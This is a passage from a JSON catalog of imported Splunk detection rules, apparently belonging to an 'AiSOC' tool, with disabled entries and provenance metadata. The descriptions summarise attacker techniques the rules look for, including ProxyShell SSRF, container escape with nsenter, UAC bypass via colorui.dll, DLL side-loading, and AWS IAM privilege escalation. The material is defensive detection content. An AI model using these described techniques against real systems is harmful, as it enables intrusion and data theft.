related processes for further investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-installutil-url-in-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "28e06670-43df-11ec-a569-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_installutil_url_in_command_line.yml" } }, { "id": "splunk-security-content-29228ab4-0762-11ec-94aa-acde48001122", "type": "detection", "name": "Exchange PowerShell Abuse via SSRF", "description": "The following analytic detects suspicious behavior indicative of ProxyShell exploitation against on-premise Microsoft Exchange servers. It identifies HTTP POST requests to `autodiscover.json` containing `PowerShell` in the URI, leveraging server-side request forgery (SSRF) to access backend PowerShell. This detection uses Exchange server logs ingested into Splunk. Monitoring this activity is crucial as it may indicate an attacker attempting to execute commands or scripts on the Exchange server. If confirmed malicious, this could lead to unauthorized access, privilege escalation, or persistent control over the Exchange environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/exchange-powershell-abuse-via-ssrf.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "29228ab4-0762-11ec-94aa-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/exchange_powershell_abuse_via_ssrf.yml" } }, { "id": "splunk-security-content-294c4686-63dd-4fe6-93a2-ca807626704a", "type": "detection", "name": "Amazon EKS Kubernetes cluster scan detection", "description": "The following analytic detects unauthenticated requests to an Amazon EKS Kubernetes cluster, specifically identifying actions by the \"system:anonymous\" user. It leverages AWS CloudWatch Logs data, focusing on user agents and authentication details. This activity is significant as it may indicate unauthorized scanning or probing of the Kubernetes cluster, which could be a precursor to an attack. If confirmed malicious, this could lead to unauthorized access, data exfiltration, or disruption of services within the Kubernetes environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/amazon-eks-kubernetes-cluster-scan-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "294c4686-63dd-4fe6-93a2-ca807626704a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/amazon_eks_kubernetes_cluster_scan_detection.yml" } }, { "id": "splunk-security-content-295ca9ed-e97b-4520-90f7-dfb6469902e1", "type": "detection", "name": "Windows DLL Side-Loading Process Child Of Calc", "description": "The following analytic identifies suspicious child processes spawned by calc.exe, indicative of a potential DLL side-loading technique. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process GUIDs, names, and parent processes. In previous versions of the \"calc.exe\" binary, namely on Windows 7, it was vulnerable to DLL side-loading, where an attacker is able to load an arbitrary DLL named \"WindowsCodecs.dll\". This activity was observed in Qakbot malware, back in 2022. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, maintain persistence, and escalate privileges, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dll-side-loading-process-child-of-calc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "295ca9ed-e97b-4520-90f7-dfb6469902e1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dll_side_loading_process_child_of_calc.yml" } }, { "id": "splunk-security-content-29af1725-7a72-4d2d-8a18-e697e79a62d3", "type": "detection", "name": "O365 External Identity Policy Changed", "description": "The following analytic identifies when changes are made to the external guest policies within Azure AD. With Azure AD B2B collaboration, users and administrators can invite external users to collaborate with internal users. This detection also attempts to highlight what may have changed. External guest account invitations should be monitored by security teams as they could potentially lead to unauthorized access. An example of this attack vector was described at BlackHat 2022 by security researcher Dirk-Jan during his tall `Backdooring and Hijacking Azure AD Accounts by Abusing External Identities`.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-external-identity-policy-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "29af1725-7a72-4d2d-8a18-e697e79a62d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_external_identity_policy_changed.yml" } }, { "id": "splunk-security-content-29b99201-723c-4118-847a-db2b3d3fb8ea", "type": "detection", "name": "GetWmiObject Ds Computer with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-WmiObject` cmdlet with the `DS_Computer` class parameter via PowerShell Script Block Logging (EventCode=4104). This detection leverages script block text to identify queries targeting domain computers using WMI. Monitoring this activity is crucial as adversaries and Red Teams may use it for Active Directory Discovery and situational awareness. If confirmed malicious, this behavior could allow attackers to map out domain computers, facilitating further attacks such as lateral movement or privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-ds-computer-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "29b99201-723c-4118-847a-db2b3d3fb8ea", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_ds_computer_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-29eb39d3-2bc8-49cc-99b3-35593191a588", "type": "detection", "name": "Azure AD Service Principal Privilege Escalation", "description": "This detection identifies when an Azure Service Principal elevates privileges by adding themself to a new app role assignment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-service-principal-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "29eb39d3-2bc8-49cc-99b3-35593191a588", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_service_principal_privilege_escalation.yml" } }, { "id": "splunk-security-content-2a048c14-4634-11ec-a618-3e22fbd008af", "type": "detection", "name": "Remote Process Instantiation via WMI and PowerShell Script Block", "description": "The following analytic detects the execution of the `Invoke-WmiMethod` commandlet with parameters used to start a process on a remote endpoint via WMI, leveraging PowerShell Script Block Logging (EventCode=4104). This method identifies specific script block text patterns associated with remote process instantiation. This activity is significant as it may indicate lateral movement or remote code execution attempts by adversaries. If confirmed malicious, this could allow attackers to execute arbitrary code on remote systems, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-wmi-and-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a048c14-4634-11ec-a618-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_wmi_and_powershell_script_block.yml" } }, { "id": "splunk-security-content-2a371608-331d-4034-ae2c-21dda8f1d0ec", "type": "detection", "name": "Processes Tapping Keyboard Events", "description": "The following analytic detects processes on macOS systems that are tapping keyboard events, potentially monitoring all keystrokes made by a user. It leverages data from osquery results within the Alerts data model, focusing on specific process names and command lines. This activity is significant as it is a common technique used by Remote Access Trojans (RATs) to log keystrokes, posing a serious security risk. If confirmed malicious, this could lead to unauthorized access to sensitive information, including passwords and personal data, compromising the integrity and confidentiality of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/processes-tapping-keyboard-events.yaml", "provenance": { "source": "splunk/security_content", "source_id": "2a371608-331d-4034-ae2c-21dda8f1d0ec", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/processes_tapping_keyboard_events.yml" } }, { "id": "splunk-security-content-2a9b80d3-6220-4345-b5ad-290bf5d0d222", "type": "detection", "name": "Detect Spike in AWS Security Hub Alerts for User", "description": "The following analytic identifies a spike in the number of AWS Security Hub alerts for an AWS IAM User within a 4-hour interval. It leverages AWS Security Hub findings data, calculating the average and standard deviation of alerts to detect significant deviations. This activity is significant as a sudden increase in alerts for a specific user may indicate suspicious behavior or a potential security incident. If confirmed malicious, this could signify an ongoing attack, unauthorized access, or misuse of IAM credentials, potentially leading to data breaches or further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-spike-in-aws-security-hub-alerts-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6220-4345-b5ad-290bf5d0d222", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_spike_in_aws_security_hub_alerts_for_user.yml" } }, { "id": "splunk-security-content-2a9b80d3-6340-4345-11ad-212bf3d0d111", "type": "detection", "name": "AWS CreateAccessKey", "description": "The following analytic identifies the creation of AWS IAM access keys by a user for another user, which can indicate privilege escalation. It leverages AWS CloudTrail logs to detect instances where the user creating the access key is different from the user for whom the key is created. This activity is significant because unauthorized access key creation can allow attackers to establish persistence or exfiltrate data via AWS APIs. If confirmed malicious, this could lead to unauthorized access to AWS services, data exfiltration, and long-term persistence in the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-createaccesskey.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6340-4345-11ad-212bf3d0d111", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_createaccesskey.yml" } }, { "id": "splunk-security-content-2a9b80d3-6340-4345-11ad-212bf3d0dac4", "type": "detection", "name": "AWS SetDefaultPolicyVersion", "description": "The following analytic detects when a user sets a default policy version in AWS. It leverages AWS CloudTrail logs to identify the `SetDefaultPolicyVersion` event from the IAM service. This activity is significant because attackers may exploit this technique for privilege escalation, especially if previous policy versions grant more extensive permissions than the current one. If confirmed malicious, this could allow an attacker to gain elevated access to AWS resources, potentially leading to unauthorized actions and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-setdefaultpolicyversion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6340-4345-11ad-212bf3d0dac4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_setdefaultpolicyversion.yml" } }, { "id": "splunk-security-content-2a9b80d3-6340-4345-11ad-212bf444d111", "type": "detection", "name": "AWS CreateLoginProfile", "description": "The following analytic identifies the creation of a login profile for one AWS user by another, followed by a console login from the same source IP. It uses AWS CloudTrail logs to correlate the `CreateLoginProfile` and `ConsoleLogin` events based on the source IP and user identity. This activity is significant as it may indicate privilege escalation, where an attacker creates a new login profile to gain unauthorized access. If confirmed malicious, this could allow the attacker to escalate privileges and maintain persistent access to the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-createloginprofile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6340-4345-11ad-212bf444d111", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_createloginprofile.yml" } }, { "id": "splunk-security-content-2a9b80d3-6340-4345-b5ad-212bf3d0dac4", "type": "detection", "name": "AWS Create Policy Version to allow all resources", "description": "The following analytic identifies the creation of a new AWS IAM policy version that allows access to all resources. It detects this activity by analyzing AWS CloudTrail logs for the CreatePolicyVersion event with a policy document that grants broad permissions. This behavior is significant because it violates the principle of least privilege, potentially exposing the environment to misuse or abuse. If confirmed malicious, an attacker could gain extensive access to AWS resources, leading to unauthorized actions, data exfiltration, or further compromise of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-create-policy-version-to-allow-all-resources.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6340-4345-b5ad-212bf3d0dac4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_create_policy_version_to_allow_all_resources.yml" } }, { "id": "splunk-security-content-2a9b80d3-6340-4345-b5ad-290bf3d0dac4", "type": "detection", "name": "Detect New Open S3 buckets", "description": "The following analytic identifies the creation of open/public S3 buckets in AWS. It detects this activity by analyzing AWS CloudTrail events for `PutBucketAcl` actions where the access control list (ACL) grants permissions to all users or authenticated users. This activity is significant because open S3 buckets can expose sensitive data to unauthorized access, leading to data breaches. If confirmed malicious, an attacker could read, write, or fully control the contents of the bucket, potentially leading to data exfiltration or tampering.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-new-open-s3-buckets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6340-4345-b5ad-290bf3d0dac4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_new_open_s3_buckets.yml" } }, { "id": "splunk-security-content-2a9b80d3-6340-4345-b5ad-290bf3d222c4", "type": "detection", "name": "AWS EC2 Snapshot Shared Externally", "description": "The following analytic detects when an EC2 snapshot is shared with an external AWS account by analyzing AWS CloudTrail events. This detection method leverages CloudTrail logs to identify modifications in snapshot permissions, specifically when the snapshot is shared outside the originating AWS account. This activity is significant as it may indicate an attempt to exfiltrate sensitive data stored in the snapshot. If confirmed malicious, an attacker could gain unauthorized access to the snapshot's data, potentially leading to data breaches or further exploitation of the compromised information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-ec2-snapshot-shared-externally.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6340-4345-b5ad-290bf3d222c4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_ec2_snapshot_shared_externally.yml" } }, { "id": "splunk-security-content-2a9b80d3-6340-4345-b5ad-290bf5d0d222", "type": "detection", "name": "Detect Spike in AWS Security Hub Alerts for EC2 Instance", "description": "The following analytic identifies a spike in the number of AWS Security Hub alerts for an EC2 instance within a 4-hour interval. It leverages AWS Security Hub findings data, calculating the average and standard deviation of alerts to detect anomalies. This activity is significant for a SOC as a sudden increase in alerts may indicate potential security incidents or misconfigurations requiring immediate attention. If confirmed malicious, this could signify an ongoing attack, leading to unauthorized access, data exfiltration, or disruption of services on the affected EC2 instance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-spike-in-aws-security-hub-alerts-for-ec2-instance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6340-4345-b5ad-290bf5d0d222", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_spike_in_aws_security_hub_alerts_for_ec2_instance.yml" } }, { "id": "splunk-security-content-2a9b80d3-6a40-4115-11ad-212bf3d0d111", "type": "detection", "name": "AWS UpdateLoginProfile", "description": "The following analytic detects an AWS CloudTrail event where a user with permissions updates the login profile of another user. It leverages CloudTrail logs to identify instances where the user making the change is different from the user whose profile is being updated. This activity is significant because it can indicate privilege escalation attempts, where an attacker uses a compromised account to gain higher privileges. If confirmed malicious, this could allow the attacker to escalate their privileges, potentially leading to unauthorized access and control over sensitive resources within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-updateloginprofile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6a40-4115-11ad-212bf3d0d111", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_updateloginprofile.yml" } }, { "id": "splunk-security-content-2a9f3a2e-2c07-4c5f-9e42-8f8f0b6b6a12", "type": "detection", "name": "GitHub Workflow File Creation or Modification", "description": "The following analytic hunts for any creations or modifications to GitHub Actions workflow YAML files across the organization's Linux or Windows endpoints.\nThis hunting query tracks all workflow file activity under .github/workflows directories to help defenders establish baselines of legitimate CI/CD workflow creation patterns, identify unusual or unauthorized changes, and detect anomalies that may indicate supply chain compromise.\nGitHub Actions workflows execute with privileged access to secrets and deployment credentials, making them high-value targets for attackers.\nBy monitoring workflow file modifications over time, defenders can identify suspicious patterns such as unexpected workflow creation on developer workstations, modifications outside normal change windows, or activity in repositories that don't typically contain workflows.\nThis data is essential for detecting supply chain attacks like Shai-Hulud that inject malicious workflows across multiple repositories.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.006", "T1554", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-workflow-file-creation-or-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9f3a2e-2c07-4c5f-9e42-8f8f0b6b6a12", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/github_workflow_file_creation_or_modification.yml" } }, { "id": "splunk-security-content-2acf0e19-4149-451c-a3f3-39cd3c77e37d", "type": "detection", "name": "Windows System Binary Proxy Execution Compiled HTML File Decompile", "description": "The following analytic detects the use of the decompile parameter with the HTML Help application (HH.exe). This behavior is identified through Endpoint Detection and Response (EDR) telemetry, focusing on command-line executions involving the decompile parameter. This activity is significant because it is an uncommon command and has been associated with APT41 campaigns, where it was used to unpack HTML help files for further malicious actions. If confirmed malicious, this technique could allow attackers to execute arbitrary commands, potentially leading to further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-binary-proxy-execution-compiled-html-file-decompile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2acf0e19-4149-451c-a3f3-39cd3c77e37d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_binary_proxy_execution_compiled_html_file_decompile.yml" } }, { "id": "splunk-security-content-2afa393f-b88d-41b7-9793-623c93a2dfde", "type": "detection", "name": "Windows Cmdline Tool Execution From Non-Shell Process", "description": "The following analytic identifies instances where `ipconfig.exe`, `systeminfo.exe`, or similar tools are executed by a non-standard shell parent process, excluding CMD, PowerShell, or Explorer. This detection leverages Endpoint Detection and Response (EDR) telemetry to monitor process creation events. Such behavior is significant as it may indicate adversaries using injected processes to perform system discovery, a tactic observed in FIN7's JSSLoader. If confirmed malicious, this activity could allow attackers to gather critical host information, aiding in further exploitation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-cmdline-tool-execution-from-non-shell-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2afa393f-b88d-41b7-9793-623c93a2dfde", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cmdline_tool_execution_from_non_shell_process.yml" } }, { "id": "splunk-security-content-2b8a7a21-bec6-4e1f-84c4-7b319f45d2ab", "type": "detection", "name": "Cisco Isovalent - Potential Escape to Host", "description": "This analytic detects potential container escape or reconnaissance attempts by monitoring for the rapid execution of multiple suspicious Linux commands (nsenter, mount, ps aux, and ls) within a short time window. The search aggregates process execution logs into 5-minute buckets and identifies when two or more distinct commands occur in quick succession. This behavior is noteworthy because attackers often chain these commands together to pivot from a container into the host, enumerate processes, or browse filesystems. For a SOC, catching these clustered command executions is important because it highlights possible adversary activity attempting to break isolation and escalate privileges inside a Kubernetes environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1611" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-potential-escape-to-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2b8a7a21-bec6-4e1f-84c4-7b319f45d2ab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___potential_escape_to_host.yml" } }, { "id": "splunk-security-content-2bb1a362-7aa8-444a-92ed-1987e8da83e1", "type": "detection", "name": "Windows Command Shell DCRat ForkBomb Payload", "description": "The following analytic detects the execution of a DCRat \"forkbomb\" payload, which spawns multiple cmd.exe processes that launch notepad.exe instances in quick succession. This detection leverages Endpoint Detection and Response (EDR) data, focusing on the rapid creation of cmd.exe and notepad.exe processes within a 30-second window. This activity is significant as it indicates a potential DCRat infection, a known Remote Access Trojan (RAT) with destructive capabilities. If confirmed malicious, this behavior could lead to system instability, resource exhaustion, and potential disruption of services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-command-shell-dcrat-forkbomb-payload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2bb1a362-7aa8-444a-92ed-1987e8da83e1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_command_shell_dcrat_forkbomb_payload.yml" } }, { "id": "splunk-security-content-2bcccd20-fc2b-11eb-8d22-acde48001122", "type": "detection", "name": "UAC Bypass With Colorui COM Object", "description": "The following analytic detects a potential UAC bypass using the colorui.dll COM Object. It leverages Sysmon EventCode 7 to identify instances where colorui.dll is loaded by a process other than colorcpl.exe, excluding common system directories. This activity is significant because UAC bypass techniques are often used by malware, such as LockBit ransomware, to gain elevated privileges without user consent. If confirmed malicious, this could allow an attacker to execute code with higher privileges, leading to further system compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/uac-bypass-with-colorui-com-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2bcccd20-fc2b-11eb-8d22-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/uac_bypass_with_colorui_com_object.yml" } }, { "id": "splunk-security-content-2c0427aa-982c-4e97-bc33-bddeda4fd095", "type": "detection", "name": "Windows Developer-Signed MSIX Package Installation", "description": "This detection identifies the installation of developer-signed MSIX packages that lack Microsoft Store signatures. All malicious MSIX packages observed in recent threat campaigns (including those from FIN7, Zloader/Storm-0569, and FakeBat/Storm-1113) were developer-signed rather than Microsoft Store signed. Microsoft Store apps have specific publisher IDs containing '8wekyb3d8bbwe' or 'cw5n1h2txyewy', while developer-signed packages lack these identifiers. This detection focuses on EventID 855 from the Microsoft-Windows-AppXDeployment-Server/Operational logs, which indicates a completed package installation.", 